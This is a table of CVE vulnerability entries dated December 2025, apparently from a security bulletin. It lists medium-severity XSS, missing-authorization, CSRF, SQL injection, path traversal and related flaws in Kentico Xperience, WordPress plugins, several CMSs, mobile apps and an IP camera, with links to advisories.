| Kentico--Xperience | An HTML injection vulnerability in Kentico Xperience allows attackers to inject malicious HTML values into form submission emails via unencoded form fields. Unencoded form values could enable HTML content execution in recipient email clients, potentially compromising email security. | 2025-12-18 | 4.6 | CVE-2022-50684 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.71 Form Emails HTML Injection |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via XML file uploads as page attachments or metafiles. Attackers can upload malicious XML files that enable stored XSS, allowing malicious scripts to execute in users' browsers. | 2025-12-18 | 4.6 | CVE-2022-50685 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.56 File Upload Stored XSS |
| Mapro Collins--Magazine Edge | Missing Authorization vulnerability in Mapro Collins Magazine Edge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Magazine Edge: from n/a through 1.13. | 2025-12-20 | 4.3 | CVE-2023-25068 | https://vdp.patchstack.com/database/wordpress/theme/magazine-edge/vulnerability/wordpress-magazine-edge-theme-1-13-authenticated-arbitrary-plugin-activation?_s_id=cve |
| mojofywp--WP Affiliate Disclosure | Vulnerability in mojofywp WP Affiliate Disclosure wp-affiliate-disclosure.This issue affects WP Affiliate Disclosure: from n/a through 1.2.6. | 2025-12-21 | 4.3 | CVE-2023-47232 | https://vdp.patchstack.com/database/wordpress/plugin/wp-affiliate-disclosure/vulnerability/wordpress-wp-affiliate-disclosure-plugin-1-2-6-broken-access-control-csrf-vulnerability?_s_id=cve |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts in the administration interface. Attackers can exploit this vulnerability to execute arbitrary scripts within the administrative context. | 2025-12-18 | 4.6 | CVE-2023-53736 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.120 Administration Interface Reflected XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows global administrators to inject malicious payloads via the Localization application. Attackers can execute scripts that could affect multiple parts of the administration interface. | 2025-12-18 | 4.6 | CVE-2023-53737 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.101 Localization Application Stored XSS |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via page preview URLs. Attackers can exploit this vulnerability to execute arbitrary scripts in users' browsers during page preview interactions. | 2025-12-18 | 4.6 | CVE-2023-53738 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.109 Page Preview Reflected XSS |
| Rukovoditel--Rukovoditel | Rukovoditel 3.4.1 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert XSS payloads in project task comments to execute arbitrary JavaScript in victim browsers. | 2025-12-16 | 4.6 | CVE-2023-53897 | ExploitDB-51548 Rukovoditel Product Webpage VulnCheck Advisory: Rukovoditel 3.4.1 Multiple Stored Cross-Site Scripting via Comments |
| Rukovoditel--Rukovoditel | Rukovoditel 3.4.1 contains a stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert iframe and script payloads in application copyright text to execute arbitrary JavaScript in victim browsers. | 2025-12-16 | 4.6 | CVE-2023-53898 | ExploitDB-51548 Rukovoditel Product Webpage VulnCheck Advisory: Rukovoditel 3.4.1 Multiple Stored Cross-Site Scripting via Configuration |
| Xenforo--Xenforo | Xenforo 2.2.13 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the smilie category title parameter. Attackers can create a smilie category with a malicious script that will execute when the admin panel is loaded, potentially enabling further client-side attacks. | 2025-12-17 | 4.6 | CVE-2023-53904 | ExploitDB-51547 Official Product Webpage VulnCheck Advisory: Xenforo 2.2.13 Authenticated Stored Cross-Site Scripting via Smilie Categories |
| projectSend--projectSend | projectSend r1605 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious JavaScript through the custom assets configuration page. Attackers can craft a JavaScript payload in the custom assets section that will execute when other users load the affected page, enabling persistent script injection. | 2025-12-17 | 4.6 | CVE-2023-53906 | ExploitDB-51518 Official Product Webpage VulnCheck Advisory: ProjectSend r1605 Stored Cross-Site Scripting via Custom Assets Page |
| Tmrswrr--Textpattern CMS | Textpattern CMS 4.8.8 contains a stored cross-site scripting vulnerability in the article excerpt field that allows authenticated users to inject malicious scripts. Attackers can insert JavaScript payloads into the excerpt, which will execute when the article is viewed by other users. | 2025-12-17 | 4.6 | CVE-2023-53911 | ExploitDB-51523 Official Product Webpage VulnCheck Advisory: Textpattern CMS 4.8.8 Authenticated Stored Cross-Site Scripting via Article Excerpt |
| Podcastgenerator--PodcastGenerator | PodcastGenerator 3.2.9 contains a stored cross-site scripting vulnerability in the Freebox content field accessible through the theme customization interface (theme_freebox.php). Malicious JavaScript payloads injected into the Freebox content execute when users visit the application's home page. | 2025-12-17 | 4.6 | CVE-2023-53919 | ExploitDB-51454 Official Product Webpage VulnCheck Advisory: PodcastGenerator Stored Cross-Site Scripting via Freebox Content Field |
| Podcastgenerator--PodcastGenerator | PodcastGenerator 3.2.9 contains a stored cross-site scripting vulnerability in the podcast title field accessible through the podcast details interface (podcast_details.php). Malicious JavaScript payloads injected into the podcast title execute when users visit the application's home page. | 2025-12-17 | 4.6 | CVE-2023-53920 | ExploitDB-51454 Official Product Webpage VulnCheck Advisory: PodcastGenerator Stored Cross-Site Scripting via Podcast Title Field |
| s9y--Serendipity | Serendipity 2.4.0 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts through blog entry creation. Attackers can craft entries with JavaScript payloads that will execute when other users view the compromised blog post. | 2025-12-17 | 4.6 | CVE-2023-53932 | ExploitDB-51373 Official Product Homepage VulnCheck Advisory: Serendipity 2.4.0 Stored Cross-Site Scripting via Admin Entry Creation |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form validation rule configuration. Attackers can exploit this vulnerability to execute malicious scripts that will run in users' browsers. | 2025-12-18 | 4.6 | CVE-2024-58321 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.159 Form Validation Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious code into shipping options configuration. This could lead to potential theft of sensitive data by executing malicious scripts in users' browsers. | 2025-12-18 | 4.6 | CVE-2024-58322 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.158 Shipping Options Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Checkbox form component. This allows malicious scripts to execute in users' browsers by exploiting HTML support in the form builder. | 2025-12-18 | 4.6 | CVE-2024-58323 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.158 Checkbox Form Component Stored XSS |
| wpdevteam--Gutenberg Essential Blocks Page Builder for Gutenberg Blocks & Patterns | The Gutenberg Essential Blocks - Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to unauthorized access of data due to a missing or incorrect capability checks on the get_instagram_access_token_callback, google_map_api_key_save_callback and get_siteinfo functions in all versions up to, and including, 5.7.2. This makes it possible for authenticated attackers, with Author-level access and above, to view API keys configured for the external services. | 2025-12-17 | 4.3 | CVE-2025-11369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e5b1e90-53f7-4afc-9544-c36afe1ee813?source=cve https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Integrations/OpenVerse.php#L108 https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Integrations/Instagram.php#L20 https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Integrations/GoogleMap.php#L50 |
| saadiqbal--myCred Points Management System For Gamification, Ranks, Badges, and Loyalty Program. | The myCred - Points Management System For Gamification, Ranks, Badges, and Loyalty Program plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.9.7.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive information including user IDs, display names, and email addresses of all users on the site via the get_bank_accounts AJAX action. Passwords are not exposed. | 2025-12-19 | 4.3 | CVE-2025-12361 | https://www.wordfence.com/threat-intel/vulnerabilities/id/43b05697-bc36-4f32-86b4-2feef892fe42?source=cve https://plugins.trac.wordpress.org/browser/mycred/tags/2.9.5.1/addons/banking/services/mycred-service-central.php#L172 https://plugins.trac.wordpress.org/changeset/3421768/mycred/trunk?contextall=1&old=3417299&old_path=%2Fmycred%2Ftrunk |
| dylanjkotze--Zephyr Project Manager | The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.203 via the `file` parameter. This makes it possible for authenticated attackers, with Custom-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. On a servers that have `allow_url_fopen` enabled, this issue allows for Server-Side Request Forgery | 2025-12-17 | 4.9 | CVE-2025-12496 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b4b0640-d61a-4969-a5c0-d2d709fb56d0?source=cve https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Base/AjaxHandler.php#L3506 https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Core/Projects.php#L1870 |
| ninjateam--FileBird WordPress Media Library Folders & File Manager | The FileBird - WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 6.5.1 via the "ConvertController::insertToNewTable" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author level access and above, to inject global folders and reassign arbitrary media attachments to those folders under certain circumstances. | 2025-12-15 | 4.3 | CVE-2025-12900 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59592b27-d431-499a-b3c3-3d43a5513c36?source=cve https://plugins.trac.wordpress.org/changeset/3411587 |
| realmag777--HUSKY Products Filter Professional for WooCommerce | The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.7.3 via the "woof_add_subscr" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber level access and above, to create product messenger subscriptions on behalf of arbitrary users, including administrators. | 2025-12-18 | 4.3 | CVE-2025-13110 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ea2dfc5-0dcc-4ea1-9ade-d59021e078fa?source=cve https://plugins.trac.wordpress.org/changeset/3412492/woocommerce-products-filter https://plugins.trac.wordpress.org/changeset/3415428/woocommerce-products-filter |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.5, 11.0.x <= 11.0.4, 10.12.x <= 10.12.2 fail to invalidate invite tokens after use which allows malicious actors who have intercepted invite tokens to manipulate channel memberships including adding or removing users from private channels via token replay attack. | 2025-12-17 | 4.3 | CVE-2025-13324 | https://mattermost.com/security-updates |
| dipesh_patel--Web to SugarCRM Lead | The Web to SugarCRM Lead plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the custom field deletion functionality. This makes it possible for unauthenticated attackers to delete custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-21 | 4.3 | CVE-2025-13361 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b7c54b5d-ad73-44f1-afdb-01136ec0b9ae?source=cve https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/trunk/wpscl-admin-functions.php#L496 https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/tags/1.0.0/wpscl-admin-functions.php#L496 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3423497%40web-to-sugarcrm-lead&new=3423497%40web-to-sugarcrm-lead |
| codename065--Download Manager | The Download Manager plugin for WordPress is vulnerable to unauthorized access of sensitive information in all versions up to, and including, 3.3.32. This is due to missing authorization and capability checks on the `wpdm_media_access` AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve passwords and access control settings for protected media attachments, which can then be used to bypass the intended media protection and download restricted files. | 2025-12-18 | 4.3 | CVE-2025-13498 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f2cdd50d-6290-4cef-a72c-2e9d680d4f1f?source=cve https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.32/src/MediaLibrary/MediaAccessControl.php#L26 https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.32/src/MediaLibrary/MediaAccessControl.php#L275 https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.32/src/MediaLibrary/MediaAccessControl.php#L299 https://plugins.trac.wordpress.org/changeset/3413804/ |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getAuthors function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to retrieve emails for all users with edit_posts capability. | 2025-12-16 | 4.3 | CVE-2025-13741 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f67da8c-da60-4c77-a8b8-7dfc027662e9?source=cve https://plugins.trac.wordpress.org/browser/post-expirator/tags/4.9.1/src/Modules/Workflows/Rest/RestApiV1.php#L376 |
| mateuszgbiorczyk--Converter for Media Optimize images | Convert WebP & AVIF | The Converter for Media - Optimize images | Convert WebP & AVIF plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `/webp-converter/v1/regenerate-attachment` REST endpoint in all versions up to, and including, 6.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete optimized WebP/AVIF variants for arbitrary attachments. | 2025-12-17 | 4.3 | CVE-2025-13750 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9a31190f-e2ed-46ee-a224-85a0a003738d?source=cve https://plugins.trac.wordpress.org/changeset/3414745/webp-converter-for-media |
| themeisle--Auto Featured Image (Auto Post Thumbnail) | The Auto Featured Image (Auto Post Thumbnail) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulk_action_generate_handler function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete or generate featured images on posts they do not own. | 2025-12-16 | 4.3 | CVE-2025-13794 | https://www.wordfence.com/threat-intel/vulnerabilities/id/29b0fd97-a669-42bb-b01e-bdc0395d697e?source=cve https://plugins.trac.wordpress.org/browser/auto-post-thumbnail/tags/4.2.1/includes/class-plugin.php#L425 |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Image Gallery - Photo Grid & Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `add_images_to_gallery_callback()` function in all versions up to, and including, 2.13.3. This makes it possible for authenticated attackers, with Author-level access and above, to add images to arbitrary Modula galleries owned by other users. | 2025-12-15 | 4.3 | CVE-2025-14003 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4490afba-1487-40a4-99c6-c753acb10df3?source=cve https://plugins.trac.wordpress.org/changeset/3414176/modula-best-grid-gallery |
| LINE Corporation--LINE client for iOS | The in-app browser in LINE client for iOS versions prior to 14.14 is vulnerable to address bar spoofing, which could allow attackers to execute malicious JavaScript within iframes while displaying trusted URLs, enabling phishing attacks through overlaid malicious content. | 2025-12-15 | 4.3 | CVE-2025-14021 | https://hackerone.com/reports/2548498 |
| hasthemes--WC Builder WooCommerce Page Builder for WPBakery | The WC Builder - WooCommerce Page Builder for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'heading_color' parameter (and multiple other styling parameters) of the `wpbforwpbakery_product_additional_information` shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 4.4 | CVE-2025-14054 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4e4fe4b6-cc1e-40be-bd2e-bf2745244892?source=cve https://plugins.trac.wordpress.org/browser/wc-builder/trunk/includes/addons/product_additional_information.php#L33 https://plugins.trac.wordpress.org/browser/wc-builder/tags/1.2.0/includes/addons/product_additional_information.php#L33 https://plugins.trac.wordpress.org/changeset/3419217/ |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member plugin for WordPress is vulnerable to Profile Privacy Setting Bypass in all versions up to, and including, 2.11.0. This is due to a flaw in the secure fields mechanism where field keys are stored in the allowed fields list before the `required_perm` check is applied during rendering. This makes it possible for authenticated attackers with Subscriber-level access to modify their profile privacy settings (e.g., setting profile to "Only me") via direct parameter manipulation, even when the administrator has explicitly disabled the option for their role. | 2025-12-17 | 4.3 | CVE-2025-14081 | https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/um-actions-account.php#L322 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-account.php#L610 https://plugins.trac.wordpress.org/changeset/3421362/ |
| edckwt--Quran Gateway | The Quran Gateway plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing nonce validation in the quran_gateway_options function. This makes it possible for unauthenticated attackers to modify the plugin's display settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-20 | 4.3 | CVE-2025-14164 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e16da38-709a-4b9a-9f00-efe8459a1318?source=cve https://plugins.trac.wordpress.org/browser/quran-gateway/trunk/admin.php#L457 https://plugins.trac.wordpress.org/browser/quran-gateway/tags/1.5/admin.php#L457 |
| wpmaniax--WP DB Booster | The WP DB Booster plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing nonce validation on the cleanup_all AJAX action. This makes it possible for unauthenticated attackers to delete database records including post drafts, revisions, comments, and metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-20 | 4.3 | CVE-2025-14168 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc0af0a4-81b5-425e-aba3-0c422aa33634?source=cve https://plugins.trac.wordpress.org/browser/wp-db-booster/trunk/admin/class-wp-db-booster-admin.php#L336 https://plugins.trac.wordpress.org/browser/wp-db-booster/tags/1.0.1/admin/class-wp-db-booster-admin.php#L336 |
| bdthemes--Prime Slider Addons for Elementor | The Prime Slider - Addons for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.9 via the import_elementor_template AJAX action. This makes it possible for authenticated attackers, with subscriber level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-18 | 4.3 | CVE-2025-14277 | https://www.wordfence.com/threat-intel/vulnerabilities/id/069a56a1-ca17-43cc-a51f-51b6111f5b61?source=cve https://plugins.trac.wordpress.org/changeset/3419222/bdthemes-prime-slider-lite |
| wpcodefactory--Download Plugins and Themes in ZIP from Dashboard | The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.6. This is due to missing or incorrect nonce validation on the download_plugin_bulk and download_theme_bulk functions. This makes it possible for unauthenticated attackers to archive all the sites plugins and themes and place them in the `wp-content/uploads/` directory via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-17 | 4.3 | CVE-2025-14399 | https://www.wordfence.com/threat-intel/vulnerabilities/id/845b6bcf-004b-4b92-88d7-3d331fa58c11?source=cve https://plugins.trac.wordpress.org/changeset/3417484/download-plugins-dashboard |
| listingthemes--Sweet Energy Efficiency | The Sweet Energy Efficiency plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on the 'sweet_energy_efficiency_action' AJAX handler in all versions up to, and including, 1.0.6. This makes it possible for authenticated attackers, with subscriber level access and above, to read, modify, and delete arbitrary graphs. | 2025-12-18 | 4.3 | CVE-2025-14618 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ccc8b30-1bdf-4335-85a9-79c6f9a88afc?source=cve https://plugins.trac.wordpress.org/changeset/3417589/sweet-energy-efficiency https://plugins.trac.wordpress.org/changeset/3420909/sweet-energy-efficiency |
| ketr--JEPaaS | A vulnerability was found in ketr JEPaaS up to 7.2.8. This impacts the function readAllPostil of the file /je/postil/postil/readAllPostil. Performing manipulation of the argument keyWord results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 4.7 | CVE-2025-14694 | VDB-336412 | ketr JEPaaS readAllPostil sql injection VDB-336412 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707178 | JEPaaS v7.2.8 SQL Injection https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md |
| atlaszz AI Photo Team--Galleryit App | A weakness has been identified in atlaszz AI Photo Team Galleryit App 1.3.8.2 on Android. This affects an unknown part of the component gallery.photogallery.pictures.vault.album. This manipulation causes path traversal. The attack needs to be launched locally. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 4.4 | CVE-2025-14698 | VDB-336416 | atlaszz AI Photo Team Galleryit App gallery.photogallery.pictures.vault.album path traversal VDB-336416 | CTI Indicators (IOB, IOC, TTP) Submit #706213 | BETTER FITNESS LIMITED (https://atlaszz.com/) Galleryit - Photo Vault, Album (gallery.photogallery.pictures.vault.album) V1.3.8.2 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/2 |
| Smartbit CommV--Smartschool App | A flaw has been found in Smartbit CommV Smartschool App up to 10.4.4. Impacted is an unknown function of the component be.smartschool.mobile.SplashActivity. Executing manipulation can lead to path traversal. The attack requires local access. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 4.4 | CVE-2025-14702 | VDB-336419 | Smartbit CommV Smartschool App be.smartschool.mobile.SplashActivity path traversal VDB-336419 | CTI Indicators (IOB, IOC, TTP) Submit #706220 | Smartbit(http://www.smartschool.be/) Smartschool (be.smartschool.mobile) V10.4.4 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/4 |
| CTCMS--Content Management System | A vulnerability was identified in CTCMS Content Management System up to 2.1.2. The affected element is the function Save of the file /ctcms/libs/Ct_App.php of the component Backend App Configuration Module. The manipulation of the argument CT_App_Paytype leads to code injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-15 | 4.7 | CVE-2025-14729 | VDB-336486 | CTCMS Content Management System Backend App Configuration Ct_App.php save code injection VDB-336486 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707104 | ctcms 2.1.2 Command Injection https://note-hxlab.wetolink.com/share/R3y6uiOuuYbA |
| CTCMS--Content Management System | A security flaw has been discovered in CTCMS Content Management System up to 2.1.2. The impacted element is an unknown function in the library /ctcms/libs/Ct_Config.php of the component Backend System Configuration Module. The manipulation of the argument Cj_Add/Cj_Edit results in code injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-15 | 4.7 | CVE-2025-14730 | VDB-336487 | CTCMS Content Management System Backend System Configuration Ct_Config.php code injection VDB-336487 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707105 | ctcms 2.1.2 Command Injection https://note-hxlab.wetolink.com/share/87u6f02Gho0K |
| nestornoe--Amazon affiliate lite Plugin | The "Amazon affiliate lite Plugin" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-20 | 4.4 | CVE-2025-14735 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c23cc3c-3c76-4ba8-8fa6-6ed0507a35c9?source=cve https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L105 https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L236 |
| Ningyuanda--TC155 | A vulnerability has been found in Ningyuanda TC155 57.0.2.0. The affected element is an unknown function of the component RTSP Live Video Stream Endpoint. Such manipulation leads to improper authentication. The attack must be carried out from within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 4.3 | CVE-2025-14746 | VDB-336519 | Ningyuanda TC155 RTSP Live Video Stream Endpoint improper authentication VDB-336519 | CTI Indicators (IOB, IOC) Submit #707195 | Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware Version 57.0.2.0 Missing Critical Step in Authentication https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-RTSP.md |
| Ningyuanda--TC155 | A vulnerability was found in Ningyuanda TC155 57.0.2.0. The impacted element is an unknown function of the component RTSP Service. Performing manipulation results in denial of service. The attack must originate from the local network. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 4.3 | CVE-2025-14747 | VDB-336520 | Ningyuanda TC155 RTSP Service denial of service VDB-336520 | CTI Indicators (IOB, IOC) Submit #707196 | Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware version: 57.0.2.0 Improper Check or Handling of Exceptional Conditions https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Malformed-RTSP-Describe-Request.md |
| ZZCMS--ZZCMS | A vulnerability has been found in ZZCMS 2025. Affected by this issue is the function stripfxg of the file /admin/siteconfig.php of the component Backend Website Settings Module. Such manipulation of the argument icp leads to code injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-12-17 | 4.7 | CVE-2025-14837 | VDB-336987 | ZZCMS Backend Website Settings siteconfig.php stripfxg code injection VDB-336987 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711655 | zzcms zzcms2025 Command Injection https://note-hxlab.wetolink.com/share/ekNgcv2wVBya |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to absolute directory traversal, which may allow an attacker to determine the existence of arbitrary files. | 2025-12-18 | 4.3 | CVE-2025-14848 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| CodeAstro--Real Estate Management System | A vulnerability was identified in CodeAstro Real Estate Management System 1.0. The impacted element is an unknown function of the file /admin/useragentdelete.php of the component Administrator Endpoint. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2025-12-18 | 4.7 | CVE-2025-14897 | VDB-337422 | CodeAstro Real Estate Management System Administrator Endpoint useragentdelete.php sql injection VDB-337422 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715668 | PHPGurukul CodeAstro Real Estate Management System 1.0 Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/sqli-useragentdelete.md https://codeastro.com/ |
| CodeAstro--Real Estate Management System | A security flaw has been discovered in CodeAstro Real Estate Management System 1.0. This affects an unknown function of the file /admin/userbuilderdelete.php of the component Administrator Endpoint. The manipulation results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-18 | 4.7 | CVE-2025-14898 | VDB-337423 | CodeAstro Real Estate Management System Administrator Endpoint userbuilderdelete.php sql injection VDB-337423 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715670 | PHPGurukul CodeAstro Real Estate Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/sqli-userbuilderdelete.php.md https://codeastro.com/ |
| CodeAstro--Real Estate Management System | A weakness has been identified in CodeAstro Real Estate Management System 1.0. This impacts an unknown function of the file /admin/stateadd.php of the component Administrator Endpoint. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-19 | 4.7 | CVE-2025-14899 | VDB-337424 | CodeAstro Real Estate Management System Administrator Endpoint stateadd.php sql injection VDB-337424 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715671 | PHPGurukul CodeAstro Real Estate Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/stateadd.php-sqli.md https://codeastro.com/ |
| CodeAstro--Real Estate Management System | A security vulnerability has been detected in CodeAstro Real Estate Management System 1.0. Affected is an unknown function of the file /admin/userdelete.php of the component Administrator Endpoint. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-19 | 4.7 | CVE-2025-14900 | VDB-337425 | CodeAstro Real Estate Management System Administrator Endpoint userdelete.php sql injection VDB-337425 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715672 | PHPGurukul CodeAstro Real Estate Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/userdelete-sqli.md https://codeastro.com/ |
